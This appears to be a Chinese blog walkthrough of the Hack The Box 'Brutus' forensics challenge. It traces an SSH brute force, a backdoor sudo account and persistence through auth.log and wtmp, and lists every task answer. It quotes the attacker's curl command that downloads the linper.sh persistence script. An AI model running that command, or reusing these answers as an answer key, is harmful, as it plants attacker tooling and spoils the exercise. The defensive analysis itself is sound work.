HTB-Brutus

本文最后更新于 2025年4月13日凌晨

Intro to Blue Team

Level：Very Easy

Description

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

Task 1

打开 auth.log 查看（眼睛要虾了）

日志格式

1	`<Timestamp> <Hostname> <Service>[<process_id>]: <Message>`

在日志中能发现一大段连续的 Failed... 字样的日志

这种一般是在爆破了，所以 IP 为：65.2.161.68

1 2	`Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack? :65.2.161.68`

Task 2

在被爆破之后又在后面看到了登录成功记录

1 2	`The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account? :root`

Task 3

读取 wtmp 数据，找到 root 用户登录信息

2024-03-06T06:32:45,387923+00:00 也就是 2024-03-06 06:32:45

1
2

Identify the timestamp when the attacker logged in manually to the server to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.
:2024-03-06 06:32:45

Task 4

查看和 wtmp 文件中登录时间一样的的，差了一秒钟但这是正常现象，因为验证 /etc/shadow 文件中的哈希和启动交互式会话都需要花费时间，所以答案就是 06:32:44 的信息，创建了 New Session 37

1 2	`SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2? :37`

Task 5

查找新的用户，那说明这个用户成功创建，在日志里发现 cyberjunkie 被添加到了 sudo 组中，并且有对 /etc/shadow 的访问权限

1 2	`The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account? :cyberjunkie`

Task 6

MITRE ATT&CK

在网上搜到的：ATT&CK v10版本战术介绍—持久化（二），T1136

从日志来看，应该是使用的本地创建账户，ID 为 T1136.001

1 2	`What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account? :T1136.001`

Task 7

可以看到 session 在 06:37:24 结束，所以答案为 2024-03-06 06:37:24

1 2	`What time did the attacker's first SSH session end according to auth.log? :2024-03-06 06:37:24`

Task 8

在日志结尾处能发现使用了 curl 命令

1	`/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh`

可以看到下载了 linper.sh

1
2

The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
:/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

Analysis

auth.log

Linux 中 /var/log 目录下的文件，记录所有与用户认证相关的日志，比如说 ssh

像 ssh 登录成功，查找相关日志可以过滤 Accepted password

1	`Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2`

ssh 登录失败，相关日志可以过滤 Failed password

1	`Mar 6 06:31:33 ip-172-31-35-28 sshd[2334]: Failed password for invalid user admin from 65.2.161.68 port 46454 ssh2`

爆破日志可以看是否有一段连续的登录请求

登录会话开始

1	`Mar 6 06:18:01 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)`

登录会话结束

1	`Mar 6 06:18:01 ip-172-31-35-28 CRON[1118]: pam_unix(cron:session): session closed for user confluence`

wtmp

详细解释：https://linuxhandbook.com/utmp-wtmp-btmp/

Linux 中 utmp 、wtmp、btmp 文件都用于存储用户的登录信息，但每个文件都不一样，文件存储在 /var/run 和 /var/log 中

utmp：跟踪当前登录的用户，默认由 who 和 w 显示当前登录用户的信息，uptime 记录系统启动时间。
wtmp：跟踪每次登录和历史登录系统的用户信息，默认由 last 命令查看。
btmp：记录失败的尝试登录信息，默认由 lastb 命令查看。

题目中给出的 wtmp 文件，可以使用命令读取

1	`utmpdump /var/log/wtmp`

应急响应&取证 > HTB

#应急响应

HTB-Brutus

http://example.com/2025/03/24/HTB-Brutus/

作者

butt3rf1y

发布于

2025年3月24日

许可协议

HTB-Meerkat 上一篇

Re:从零开始的 Go 之旅- 基础(4) 下一篇